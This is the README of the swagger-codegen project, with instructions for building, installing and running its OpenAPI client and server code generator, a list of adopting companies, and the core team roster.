- [Building](#building)
- [Docker](#docker)
- [Build and run](#build-and-run-using-docker)
- [Run docker in Vagrant](#run-docker-in-vagrant)
- [Public Docker image](#public-docker-image)
- [Homebrew](#homebrew)
- [Getting Started](#getting-started)
- Generators
- [To generate a sample client library](#to-generate-a-sample-client-library)
- [Generating libraries from your server](#generating-libraries-from-your-server)
- [Modifying the client library format](#modifying-the-client-library-format)
- [Making your own codegen modules](#making-your-own-codegen-modules)
- [Where is Javascript???](#where-is-javascript)
- [Generating a client from local files](#generating-a-client-from-local-files)
- [Customizing the generator](#customizing-the-generator)
- [Validating your OpenAPI Spec](#validating-your-openapi-spec)
- [Generating dynamic html api documentation](#generating-dynamic-html-api-documentation)
- [Generating static html api documentation](#generating-static-html-api-documentation)
- [To build a server stub](#to-build-a-server-stub)
- [To build the codegen library](#to-build-the-codegen-library)
- [Workflow Integration](#workflow-integration)
- [Github Integration](#github-integration)
- [Online Generators](#online-generators)
- [Guidelines for Contribution](https://github.com/swagger-api/swagger-codegen/wiki/Guidelines-for-Contribution)
- [Companies/Projects using Swagger Codegen](#companiesprojects-using-swagger-codegen)
- [Swagger Codegen Core Team](#swagger-codegen-core-team)
- [Swagger Codegen Evangelist](#swagger-codegen-evangelist)
- [License](#license)
## Compatibility
The OpenAPI Specification has undergone 3 revisions since initial creation in 2010. The swagger-codegen project has the following compatibilities with the OpenAPI Specification:
Swagger Codegen Version | Release Date | OpenAPI Spec compatibility | Notes
-------------------------- | ------------ | -------------------------- | -----
2.3.0 (upcoming minor release) | Apr/May 2017 | 1.0, 1.1, 1.2, 2.0 | Minor release with breaking changes
2.2.3 (upcoming patch release) | TBD | 1.0, 1.1, 1.2, 2.0 | Patch release without breaking changes
2.2.2 (**current stable**) | 2017-03-01 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.2](https://github.com/swagger-api/swagger-codegen/tree/v2.2.2)
2.2.1 | 2016-08-07 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.1](https://github.com/swagger-api/swagger-codegen/tree/v2.2.1)
2.1.6 | 2016-04-06 | 1.0, 1.1, 1.2, 2.0 | [tag v2.1.6](https://github.com/swagger-api/swagger-codegen/tree/v2.1.6)
2.0.17 | 2014-08-22 | 1.1, 1.2 | [tag v2.0.17](https://github.com/swagger-api/swagger-codegen/tree/v2.0.17)
1.0.4 | 2012-04-12 | 1.0, 1.1 | [tag v1.0.4](https://github.com/swagger-api/swagger-codegen/tree/swagger-codegen_2.9.1-1.1)
### Prerequisites
If you're looking for the latest stable version, you can grab it directly from Sonatype.org (Java 7 runtime at a minimum):
```
wget https://oss.sonatype.org/content/repositories/releases/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar -O swagger-codegen-cli.jar
java -jar swagger-codegen-cli.jar help
```
On a mac, it's even easier with `brew`:
```
brew install swagger-codegen
```
To build from source, you need the following installed and available in your $PATH:
* [Java 7 or 8](http://java.oracle.com)
* [Apache maven 3.3.3 or greater](http://maven.apache.org/)
#### OS X Users
Don't forget to install Java 7 or 8. You probably have 1.6.
Export JAVA_HOME in order to use the supported Java version:
```
export JAVA_HOME=`/usr/libexec/java_home -v 1.8`
export PATH=${JAVA_HOME}/bin:$PATH
```
### Building
After cloning the project, you can build it from source with this command:
```
mvn clean package
```
### Homebrew
To install, run `brew install swagger-codegen`
Here is an example usage:
```
swagger-codegen generate -i http://petstore.swagger.io/v2/swagger.json -l ruby -o /tmp/test/
```
### Docker
#### Development in docker
You can use `run-in-docker.sh` to do all development. This script maps your local repository to `/gen`
in the docker container. It also maps `~/.m2/repository` to the appropriate container location.
To execute `mvn package`:
```
git clone https://github.com/swagger-api/swagger-codegen
cd swagger-codegen
./run-in-docker.sh mvn package
```
Build artifacts are now accessible in your working directory.
Once built, `run-in-docker.sh` will act as an executable for swagger-codegen-cli. To generate code, you'll need to output to a directory under `/gen` (e.g. `/gen/out`). For example:
```
./run-in-docker.sh help # Executes 'help' command for swagger-codegen-cli
./run-in-docker.sh langs # Executes 'langs' command for swagger-codegen-cli
./run-in-docker.sh /gen/bin/go-petstore.sh # Builds the Go client
./run-in-docker.sh generate -i modules/swagger-codegen/src/test/resources/2_0/petstore.yaml \
-l go -o /gen/out/go-petstore -DpackageName=petstore # generates go client, outputs locally to ./out/go-petstore
```
#### Run Docker in Vagrant
Prerequisite: install [Vagrant](https://www.vagrantup.com/downloads.html) and [VirtualBox](https://www.virtualbox.org/wiki/Downloads).
```
git clone http://github.com/swagger-api/swagger-codegen.git
cd swagger-codegen
vagrant up
vagrant ssh
cd /vagrant
./run-in-docker.sh mvn package
```
#### Public Pre-built Docker images
- https://hub.docker.com/r/swaggerapi/swagger-generator/ (official web service)
- https://hub.docker.com/r/swaggerapi/swagger-codegen-cli/ (official CLI)
##### Swagger Generator Docker Image
The Swagger Generator image can act as a self-hosted web application and API for generating code. This container can be incorporated into a CI pipeline, and requires at least two HTTP requests and some docker orchestration to access generated code.
Example usage (note this assumes `jq` is installed for command line processing of JSON):
```
# Start container and save the container id
CID=$(docker run -d swaggerapi/swagger-generator)
# allow for startup
sleep 5
# Get the IP of the running container
GEN_IP=$(docker inspect --format '{{.NetworkSettings.IPAddress}}' $CID)
# Execute an HTTP request and store the download link
RESULT=$(curl -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{
"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"
}' 'http://localhost:8188/api/gen/clients/javascript' | jq '.link' | tr -d '"')
# Download the generated zip and redirect to a file
curl $RESULT > result.zip
# Shutdown the swagger generator image
docker stop $CID && docker rm $CID
```
In the example above, `result.zip` will contain the generated client.
##### Swagger Codegen Docker Image
The Swagger Codegen image acts as a standalone executable. It can be used as an alternative to installing via homebrew, or for developers who are unable to install Java or upgrade the installed version.
To generate code with this image, you'll need to mount a local location as a volume.
Example:
```
docker run --rm -v ${PWD}:/local swagger-api/swagger-codegen generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l go \
-o /local/out/go
```
The generated code will be located under `./out/go` in the current directory.
## Getting Started
To generate a PHP client for http://petstore.swagger.io/v2/swagger.json, please run the following
```sh
git clone https://github.com/swagger-api/swagger-codegen
cd swagger-codegen
mvn clean package
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l php \
-o /var/tmp/php_api_client
```
(if you're on Windows, replace the last command with `java -jar modules\swagger-codegen-cli\target\swagger-codegen-cli.jar generate -i http://petstore.swagger.io/v2/swagger.json -l php -o c:\temp\php_api_client`)
You can also download the JAR (latest release) directly from [maven.org](http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar)
To get a list of **general** options available, please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar help generate`
To get a list of PHP specified options (which can be passed to the generator with a config file via the `-c` option), please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l php`
## Generators
### To generate a sample client library
You can build a client against the swagger sample [petstore](http://petstore.swagger.io) API as follows:
```
./bin/java-petstore.sh
```
(On Windows, run `.\bin\windows\java-petstore.bat` instead)
This will run the generator with this command:
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l java \
-o samples/client/petstore/java
```
with a number of options. You can get the options with the `help generate` command:
```
NAME
swagger-codegen-cli generate - Generate code with chosen lang
SYNOPSIS
swagger-codegen-cli generate
[(-a <authorization> | --auth <authorization>)]
[--additional-properties <additional properties>]
[--api-package <api package>] [--artifact-id <artifact id>]
[--artifact-version <artifact version>]
[(-c <configuration file> | --config <configuration file>)]
[-D <system properties>] [--group-id <group id>]
(-i <spec file> | --input-spec <spec file>)
[--import-mappings <import mappings>]
[--instantiation-types <instantiation types>]
[--invoker-package <invoker package>]
(-l <language> | --lang <language>)
[--language-specific-primitives <language specific primitives>]
[--library <library>] [--model-package <model package>]
[(-o <output directory> | --output <output directory>)]
[(-s | --skip-overwrite)]
[(-t <template directory> | --template-dir <template directory>)]
[--type-mappings <type mappings>] [(-v | --verbose)]
OPTIONS
-a <authorization>, --auth <authorization>
adds authorization headers when fetching the swagger definitions
remotely. Pass in a URL-encoded string of name:header with a comma
separating multiple values
--additional-properties <additional properties>
sets additional properties that can be referenced by the mustache
templates in the format of name=value,name=value
--api-package <api package>
package for generated api classes
--artifact-id <artifact id>
artifactId in generated pom.xml
--artifact-version <artifact version>
artifact version in generated pom.xml
-c <configuration file>, --config <configuration file>
Path to json configuration file. File content should be in a json
format {"optionKey":"optionValue", "optionKey1":"optionValue1"...}
Supported options can be different for each language. Run
config-help -l {lang} command for language specific config options.
-D <system properties>
sets specified system properties in the format of
name=value,name=value
--group-id <group id>
groupId in generated pom.xml
-i <spec file>, --input-spec <spec file>
location of the swagger spec, as URL or file (required)
--import-mappings <import mappings>
specifies mappings between a given class and the import that should
be used for that class in the format of type=import,type=import
--instantiation-types <instantiation types>
sets instantiation type mappings in the format of
type=instantiatedType,type=instantiatedType.For example (in Java):
array=ArrayList,map=HashMap. In other words array types will get
instantiated as ArrayList in generated code.
--invoker-package <invoker package>
root package for generated code
-l <language>, --lang <language>
client language to generate (maybe class name in classpath,
required)
--language-specific-primitives <language specific primitives>
specifies additional language specific primitive types in the format
of type1,type2,type3,type3. For example:
String,boolean,Boolean,Double
--library <library>
library template (sub-template)
--model-package <model package>
package for generated models
-o <output directory>, --output <output directory>
where to write the generated files (current dir by default)
-s, --skip-overwrite
specifies if the existing files should be overwritten during the
generation.
-t <template directory>, --template-dir <template directory>
folder containing the template files
--type-mappings <type mappings>
sets mappings between swagger spec types and generated code types in
the format of swaggerType=generatedType,swaggerType=generatedType.
For example: array=List,map=Map,string=String
--reserved-words-mappings <import mappings>
specifies how a reserved name should be escaped to. Otherwise, the
default _<name> is used. For example id=identifier
-v, --verbose
verbose mode
```
You can then compile and run the client, as well as unit tests against it:
```
cd samples/client/petstore/java
mvn package
```
Other languages have petstore samples, too:
```
./bin/android-petstore.sh
./bin/java-petstore.sh
./bin/objc-petstore.sh
```
### Generating libraries from your server
It's just as easy--just use the `-i` flag to point to either a server or file.
### Modifying the client library format
Don't like the default swagger client syntax? Want a different language supported? No problem! Swagger codegen processes mustache templates with the [jmustache](https://github.com/samskivert/jmustache) engine. You can modify our templates or make your own.
You can look at `modules/swagger-codegen/src/main/resources/${your-language}` for examples. To make your own templates, create your own files and use the `-t` flag to specify your template folder. It actually is that easy.
### Making your own codegen modules
If you're starting a project with a new language and don't see what you need, swagger-codegen can help you create a project to generate your own libraries:
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar meta \
-o output/myLibrary -n myClientCodegen -p com.my.company.codegen
```
This will write, in the folder `output/myLibrary`, all the files you need to get started, including a README.md. Once modified and compiled, you can load your library with the codegen and generate clients with your own, custom-rolled logic.
You would then compile your library in the `output/myLibrary` folder with `mvn package` and execute the codegen like such:
```
java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen
```
For Windows users, you will need to use `;` instead of `:` in the classpath, e.g.
```
java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar;modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen
```
Note the `myClientCodegen` is an option now, and you can use the usual arguments for generating your library:
```
java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar \
io.swagger.codegen.SwaggerCodegen generate -l myClientCodegen\
-i http://petstore.swagger.io/v2/swagger.json \
-o myClient
```
### Where is Javascript???
See our [javascript library](http://github.com/swagger-api/swagger-js)--it's completely dynamic and doesn't require
static code generation.
There is a third-party component called [swagger-js-codegen](https://github.com/wcandillon/swagger-js-codegen) that can generate angularjs or nodejs source code from a OpenAPI Specification.
:exclamation: On Dec 7th 2015, a Javascript API client generator has been added by @jfiala.
### Generating a client from local files
If you don't want to call your server, you can save the OpenAPI Spec files into a directory and pass an argument
to the code generator like this:
```
-i ./modules/swagger-codegen/src/test/resources/2_0/petstore.json
```
Great for creating libraries on your ci server, from the [Swagger Editor](http://editor.swagger.io)... or while coding on an airplane.
### Selective generation
You may not want to generate *all* models in your project. Likewise you may want just one or two apis to be written. If that's the case, you can use system properties to control the output:
The default is generate *everything* supported by the specific library. Once you enable a feature, it will restrict the contents generated:
```
# generate only models
java -Dmodels {opts}
# generate only apis
java -Dapis {opts}
# generate only supporting files
java -DsupportingFiles
# generate models and supporting files
java -Dmodels -DsupportingFiles
```
To control the specific files being generated, you can pass a CSV list of what you want:
```
# generate the User and Pet models only
-Dmodels=User,Pet
# generate the User model and the supportingFile `StringUtil.java`:
-Dmodels=User -DsupportingFiles=StringUtil.java
```
To control generation of docs and tests for api and models, pass false to the option. For api, these options are `-DapiTests=false` and `-DapiDocs=false`. For models, `-DmodelTests=false` and `-DmodelDocs=false`.
These options default to true and don't limit the generation of the feature options listed above (like `-Dapi`):
```
# generate only models (with tests and documentation)
java -Dmodels {opts}
# generate only models (with tests but no documentation)
java -Dmodels -DmodelDocs=false {opts}
# generate only User and Pet models (no tests and no documentation)
java -Dmodels=User,Pet -DmodelTests=false {opts}
# generate only apis (without tests)
java -Dapis -DapiTests=false {opts}
# generate only apis (modelTests option is ignored)
java -Dapis -DmodelTests=false {opts}
```
When using selective generation, _only_ the templates needed for the specific generation will be used.
### Ignore file format
Swagger codegen supports a `.swagger-codegen-ignore` file, similar to `.gitignore` or `.dockerignore` you're probably already familiar with.
The ignore file allows for better control over overwriting existing files than the `--skip-overwrite` flag. With the ignore file, you can specify individual files or directories can be ignored. This can be useful, for example if you only want a subset of the generated code.
Examples:
```
# Swagger Codegen Ignore
# Lines beginning with a # are comments
# This should match build.sh located anywhere.
build.sh
# Matches build.sh in the root
/build.sh
# Exclude all recursively
docs/**
# Explicitly allow files excluded by other rules
!docs/UserApi.md
# Recursively exclude directories named Api
# You can't negate files below this directory.
src/**/Api/
# When this file is nested under /Api (excluded above),
# this rule is ignored because parent directory is excluded by previous rule.
!src/**/PetApiTests.cs
# Exclude a single, nested file explicitly
src/IO.Swagger.Test/Model/AnimalFarmTests.cs
```
The `.swagger-codegen-ignore` file must exist in the root of the output directory.
### Customizing the generator
There are different aspects of customizing the code generator beyond just creating or modifying templates. Each language has a supporting configuration file to handle different type mappings, etc:
```
$ ls -1 modules/swagger-codegen/src/main/java/io/swagger/codegen/languages/
AbstractJavaJAXRSServerCodegen.java
AbstractTypeScriptClientCodegen.java
AkkaScalaClientCodegen.java
AndroidClientCodegen.java
AspNet5ServerCodegen.java
AspNetCoreServerCodegen.java
AsyncScalaClientCodegen.java
BashClientCodegen.java
CSharpClientCodegen.java
ClojureClientCodegen.java
CsharpDotNet2ClientCodegen.java
DartClientCodegen.java
FlashClientCodegen.java
FlaskConnexionCodegen.java
GoClientCodegen.java
HaskellServantCodegen.java
JMeterCodegen.java
JavaCXFServerCodegen.java
JavaClientCodegen.java
JavaInflectorServerCodegen.java
JavaJerseyServerCodegen.java
JavaResteasyServerCodegen.java
JavascriptClientCodegen.java
NodeJSServerCodegen.java
NancyFXServerCodegen
ObjcClientCodegen.java
PerlClientCodegen.java
PhpClientCodegen.java
PythonClientCodegen.java
Qt5CPPGenerator.java
RubyClientCodegen.java
ScalaClientCodegen.java
ScalatraServerCodegen.java
SilexServerCodegen.java
SinatraServerCodegen.java
SlimFrameworkServerCodegen.java
SpringMVCServerCodegen.java
StaticDocCodegen.java
StaticHtmlGenerator.java
SwaggerGenerator.java
SwaggerYamlGenerator.java
SwiftCodegen.java
TizenClientCodegen.java
TypeScriptAngularClientCodegen.java
TypeScriptNodeClientCodegen.java
```
Each of these files creates reasonable defaults so you can get running quickly. But if you want to configure package names, prefixes, model folders, etc. you can use a json config file to pass the values.
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l java \
-o samples/client/petstore/java \
-c path/to/config.json
```
and `config.json` contains the following as an example:
```
{
"apiPackage" : "petstore"
}
```
Supported config options can be different per language. Running `config-help -l {lang}` will show available options.
**These options are applied via configuration file (e.g. config.json) or by passing them with `-D{optionName}={optionValue}**. (If `-D{optionName}` does not work, please open a [ticket](https://github.com/swagger-api/swagger-codegen/issues/new) and we'll look into it)
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l java
```
Output
```
CONFIG OPTIONS
modelPackage
package for generated models
apiPackage
package for generated api classes
sortParamsByRequiredFlag
Sort method arguments to place required parameters before optional parameters. Default: true
invokerPackage
root package for generated code
groupId
groupId in generated pom.xml
artifactId
artifactId in generated pom.xml
artifactVersion
artifact version in generated pom.xml
sourceFolder
source folder for generated code
localVariablePrefix
prefix for generated code members and local variables
serializableModel
boolean - toggle "implements Serializable" for generated models
library
library template (sub-template) to use:
jersey1 - HTTP client: Jersey client 1.18. JSON processing: Jackson 2.4.2
jersey2 - HTTP client: Jersey client 2.6
feign - HTTP client: Netflix Feign 8.1.1. JSON processing: Jackson 2.6.3
okhttp-gson (default) - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1
retrofit - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 (Retrofit 1.9.0)
retrofit2 - HTTP client: OkHttp 2.5.0. JSON processing: Gson 2.4 (Retrofit 2.0.0-beta2)
```
Your config file for Java can look like
```json
{
"groupId":"com.my.company",
"artifactId":"MyClient",
"artifactVersion":"1.2.0",
"library":"feign"
}
```
For all the unspecified options default values will be used.
Another way to override default options is to extend the config class for the specific language.
To change, for example, the prefix for the Objective-C generated files, simply subclass the ObjcClientCodegen.java:
```java
package com.mycompany.swagger.codegen;
import io.swagger.codegen.languages.*;
public class MyObjcCodegen extends ObjcClientCodegen {
static {
PREFIX = "HELO";
}
}
```
and specify the `classname` when running the generator:
```
-l com.mycompany.swagger.codegen.MyObjcCodegen
```
Your subclass will now be loaded and overrides the `PREFIX` value in the superclass.
### Bringing your own models
Sometimes you don't want a model generated. In this case, you can simply specify an import mapping to tell
the codegen what _not_ to create. When doing this, every location that references a specific model will
refer back to your classes. Note, this may not apply to all languages...
To specify an import mapping, use the `--import-mappings` argument and specify the model-to-import logic as such:
```
--import-mappings Pet=my.models.MyPet
```
Or for multiple mappings:
```
Pet=my.models.MyPet,Order=my.models.MyOrder
```
### Validating your OpenAPI Spec
You have options. The easiest is to use our [online validator](https://github.com/swagger-api/validator-badge) which not only will let you validate your spec, but with the debug flag, you can see what's wrong with your spec. For example:
http://online.swagger.io/validator/debug?url=http://petstore.swagger.io/v2/swagger.json
### Generating dynamic html api documentation
To do so, just use the `-l dynamic-html` flag when reading a spec file. This creates HTML documentation that is available as a single-page application with AJAX. To view the documentation:
```
cd samples/dynamic-html/
npm install
node .
```
Which launches a node.js server so the AJAX calls have a place to go.
### Generating static html api documentation
To do so, just use the `-l html` flag when reading a spec file. This creates a single, simple HTML file with embedded css so you can ship it as an email attachment, or load it from your filesystem:
```
cd samples/html/
open index.html
```
### To build a server stub
Please refer to https://github.com/swagger-api/swagger-codegen/wiki/Server-stub-generator-HOWTO for more information.
### To build the codegen library
This will create the swagger-codegen library from source.
```
mvn package
```
Note! The templates are included in the library generated. If you want to modify the templates, you'll need to either repackage the library OR specify a path to your scripts
## Workflow integration
You can use the [swagger-codegen-maven-plugin](modules/swagger-codegen-maven-plugin/README.md) for integrating with your workflow, and generating any codegen target.
## GitHub Integration
To push the auto-generated SDK to GitHub, we provide `git_push.sh` to streamline the process. For example:
1) Create a new repository in GitHub (Ref: https://help.github.com/articles/creating-a-new-repository/)
2) Generate the SDK
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i modules/swagger-codegen/src/test/resources/2_0/petstore.json -l perl \
--git-user-id "wing328" \
--git-repo-id "petstore-perl" \
--release-note "Github integration demo" \
-o /var/tmp/perl/petstore
```
3) Push the SDK to GitHub
```
cd /var/tmp/perl/petstore
/bin/sh ./git_push.sh
```
## Online generators
One can also generate API client or server using the online generators (https://generator.swagger.io)
For example, to generate Ruby API client, simply send the following HTTP request using curl:
```
curl -X POST -H "content-type:application/json" -d '{"swaggerUrl":"http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/ruby
```
Then you will receieve a JSON response with the URL to download the zipped code.
To customize the SDK, you can `POST` to `https://generator.swagger.io/gen/clients/{language}` with the following HTTP body:
```
{
"options": {},
"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"
}
```
in which the `options` for a language can be obtained by submitting a `GET` request to `https://generator.swagger.io/api/gen/clients/{language}`:
For example, `curl https://generator.swagger.io/api/gen/clients/python` returns
```
{
"packageName":{
"opt":"packageName",
"description":"python package name (convention: snake_case).",
"type":"string",
"default":"swagger_client"
},
"packageVersion":{
"opt":"packageVersion",
"description":"python package version.",
"type":"string",
"default":"1.0.0"
},
"sortParamsByRequiredFlag":{
"opt":"sortParamsByRequiredFlag",
"description":"Sort method arguments to place required parameters before optional parameters.",
"type":"boolean",
"default":"true"
}
}
```
To set package name to `pet_store`, the HTTP body of the request is as follows:
```
{
"options": {
"packageName": "pet_store"
},
"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"
}
```
and here is the curl command:
```
curl -H "Content-type: application/json" -X POST -d '{"options": {"packageName": "pet_store"},"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/python
```
Guidelines for Contribution
---------------------------
Please refer to this [page](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md)
Companies/Projects using Swagger Codegen
----------------------------------------
Here are some companies/projects using Swagger Codegen in production. To add your company/project to the list, please visit [README.md](https://github.com/swagger-api/swagger-codegen/blob/master/README.md) and click on the icon to edit the page.
- [Activehours](https://www.activehours.com/)
- [Acunetix](https://www.acunetix.com/)
- [Atlassian](https://www.atlassian.com/)
- [Autodesk](http://www.autodesk.com/)
- [Avenida Compras S.A.](https://www.avenida.com.ar)
- [AYLIEN](http://aylien.com/)
- [Balance Internet](https://www.balanceinternet.com.au/)
- [beemo](http://www.beemo.eu)
- [bitly](https://bitly.com)
- [Bufferfly Network](https://www.butterflynetinc.com/)
- [Cachet Financial](http://www.cachetfinancial.com/)
- [carpolo](http://www.carpolo.co/)
- [CloudBoost](https://www.CloudBoost.io/)
- [Conplement](http://www.conplement.de/)
- [Cummins] (http://www.cummins.com/)
- [Cupix](http://www.cupix.com)
- [DBBest Technologies](https://www.dbbest.com)
- [DecentFoX](http://decentfox.com/)
- [DocuSign](https://www.docusign.com)
- [Ergon](http://www.ergon.ch/)
- [EMC](https://www.emc.com/)
- [eureka](http://eure.jp/)
- [everystory.us](http://everystory.us)
- [Expected Behavior](http://www.expectedbehavior.com/)
- [Fastly](https://www.fastly.com/)
- [Flat](https://flat.io)
- [Finder](http://en.finder.pl/)
- [FH Münster - University of Applied Sciences](http://www.fh-muenster.de)
- [Fotition](https://www.fotition.com/)
- [Gear Zero Network](https://www.gearzero.ca)
- [Germin8](http://www.germin8.com)
- [goTransverse](http://www.gotransverse.com/api)
- [GraphHopper](https://graphhopper.com/)
- [Gravitate Solutions](http://gravitatesolutions.com/)
- [HashData](http://www.hashdata.cn/)
- [Hewlett Packard Enterprise](https://hpe.com)
- [High Technologies Center](http://htc-cs.com)
- [IMS Health](http://www.imshealth.com/en/solution-areas/technology-and-applications)
- [Intent HQ](http://www.intenthq.com)
- [Interactive Intelligence](http://developer.mypurecloud.com/)
- [Kabuku](http://www.kabuku.co.jp/en)
- [Kurio](https://kurio.co.id)
- [Kuroi](http://kuroiwebdesign.com/)
- [Kuary](https://kuary.com/)
- [Kubernetes](https://kubernetes.io/)
- [LANDR Audio](https://www.landr.com/)
- [Lascaux](http://www.lascaux.it/)
- [Leica Geosystems AG](http://leica-geosystems.com)
- [LiveAgent](https://www.ladesk.com/)
- [LXL Tech](http://lxltech.com)
- [MailMojo](https://mailmojo.no/)
- [Mindera](http://mindera.com/)
- [Mporium](http://mporium.com/)
- [Neverfail](https://neverfail.com/)
- [nViso](http://www.nviso.ch/)
- [Okiok](https://www.okiok.com)
- [Onedata](http://onedata.org)
- [OrderCloud.io](http://ordercloud.io)
- [OSDN](https://osdn.jp)
- [PagerDuty](https://www.pagerduty.com)
- [PagerTree](https://pagertree.com)
- [Pepipost](https://www.pepipost.com)
- [Plexxi](http://www.plexxi.com)
- [Pixoneye](http://www.pixoneye.com/)
- [PostAffiliatePro](https://www.postaffiliatepro.com/)
- [Prill Tecnologia](http://www.prill.com.br)
- [QAdept](http://qadept.com/)
- [QuantiModo](https://quantimo.do/)
- [QuickBlox](https://quickblox.com/)
- [Rapid7](https://rapid7.com/)
- [Reload! A/S](https://reload.dk/)
- [REstore](https://www.restore.eu)
- [Revault Sàrl](http://revault.ch)
- [Riffyn](https://riffyn.com)
- [Royal Bank of Canada (RBC)](http://www.rbc.com/canada.html)
- [Saritasa](https://www.saritasa.com/)
- [SCOOP Software GmbH](http://www.scoop-software.de)
- [Shine Solutions](https://shinesolutions.com/)
- [Simpfony](https://www.simpfony.com/)
- [Skurt](http://www.skurt.com)
- [Slamby](https://www.slamby.com/)
- [SmartRecruiters](https://www.smartrecruiters.com/)
- [snapCX](https://snapcx.io)
- [SPINEN](http://www.spinen.com)
- [SRC](https://www.src.si/)
- [StyleRecipe](http://stylerecipe.co.jp)
- [Svenska Spel AB](https://www.svenskaspel.se/)
- [TaskData](http://www.taskdata.com/)
- [ThoughtWorks](https://www.thoughtworks.com)
- [Upwork](http://upwork.com/)
- [uShip](https://www.uship.com/)
- [VMware](https://vmware.com/)
- [W.UP](http://wup.hu/?siteLang=en)
- [Wealthfront](https://www.wealthfront.com/)
- [Webever GmbH](https://www.webever.de/)
- [WEXO A/S](https://www.wexo.dk/)
- [Zalando](https://tech.zalando.com)
- [ZEEF.com](https://zeef.com/)
# Swagger Codegen Core Team
Swagger Codegen core team members are contributors who have been making significant contributions (review issues, fix bugs, make enhancements, etc) to the project on a regular basis.
## API Clients
| Languages | Core Team (join date) |
|:-------------|:-------------|
| ActionScript | |
| C++ | |
| C# | @jimschubert (2016/05/01) | |
| Clojure | @xhh (2016/05/01) |
| Dart | |
| Groovy | |
| Go | @guohuang (2016/05/01) @neilotoole (2016/05/01) |
| Java | @cbornet (2016/05/01) @xhh (2016/05/01) @epaul (2016/06/04) |
| Java (Spring Cloud) | @cbornet (2016/07/19) |
| NodeJS/Javascript | @xhh (2016/05/01) |
| ObjC | @mateuszmackowiak (2016/05/09) |
| Perl | @wing328 (2016/05/01) |
| PHP | @arnested (2016/05/01) |
| Python | @scottrw93 (2016/05/01) |
| Ruby | @wing328 (2016/05/01) @zlx (2016/05/22) |
| Scala | |
| Swift | @jaz-ah (2016/05/01) @Edubits (2016/05/01) |
| TypeScript (Node) | @Vrolijkx (2016/05/01) |
| TypeScript (Angular1) | @Vrolijkx (2016/05/01) |
| TypeScript (Angular2) | @Vrolijkx (2016/05/01) |
| TypeScript (Fetch) | |
## Server Stubs
| Languages | Core Team (date joined) |
|:------------- |:-------------|
| C# ASP.NET5 | @jimschubert (2016/05/01) |
| Go Server | @guohuang (2016/06/13) |
| Haskell Servant | |
| Java Spring Boot | @cbornet (2016/07/19) |
| Java Spring MVC | @kolyjjj (2016/05/01) @cbornet (2016/07/19) |
| Java JAX-RS | |
| NancyFX | |
| NodeJS | @kolyjjj (2016/05/01) |
| PHP Lumen | @abcsum (2016/05/01) |
| PHP Silex | |
| PHP Slim | |
| Python Flask | |
| Ruby Sinatra | @wing328 (2016/05/01) | |
| Scala Scalatra | | |
| Scala Finch | @jimschubert (2017/01/28) |
## Template Creator
Here is a list of template creators:
* API Clients:
* Akka-Scala: @cchafer
* Bash: @bkryza
* C++ REST: @Danielku15
* C# (.NET 2.0): @who
* Clojure: @xhh
* Dart: @yissachar
* Elixir: @niku
* Groovy: @victorgit
* Go: @wing328
* Java (Feign): @davidkiss
* Java (Retrofit): @0legg
* Java (Retrofi2): @emilianobonassi
* Java (Jersey2): @xhh
* Java (okhttp-gson): @xhh
* Javascript/NodeJS: @jfiala
* Javascript (Closure-annotated Angular) @achew22
* JMeter @davidkiss
* Perl: @wing328
* Swift: @tkqubo
* Swift 3: @hexelon
* TypeScript (Node): @mhardorf
* TypeScript (Angular1): @mhardorf
* TypeScript (Fetch): @leonyu
* TypeScript (Angular2): @roni-frantchi
* Server Stubs
* C# ASP.NET5: @jimschubert
* C# NancyFX: @mstefaniuk
* Erlang Server: @galaxie
* Go Server: @guohuang
* Haskell Servant: @algas
* Java MSF4J: @sanjeewa-malalgoda
* Java Spring Boot: @diyfr
* Java Undertow: @stevehu
* JAX-RS RestEasy: @chameleon82
* JAX-RS CXF: @hiveship
* JAX-RS CXF (CDI): @nickcmaynard
* JAX-RS RestEasy (JBoss EAP): @jfiala
* PHP Lumen: @abcsum
* PHP Slim: @jfastnacht
* PHP Zend Expressive (with Path Handler): @Articus
* Ruby on Rails 5: @zlx
* Scala Finch: @jimschubert
* Documentation
* HTML Doc 2: @jhitchcock
* Confluence Wiki: @jhitchcock
## How to join the core team
Here are the requirements to become a core team member:
- rank within top 50 in https://github.com/swagger-api/swagger-codegen/graphs/contributors
- to contribute, here are some good [starting points](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22)
- regular contributions to the project
- about 3 hours per week
- for contribution, it can be addressing issues, reviewing PRs submitted by others, submitting PR to fix bugs or make enhancements, etc
To join the core team, please reach out to wing328hk@gmail.com (@wing328) for more information.
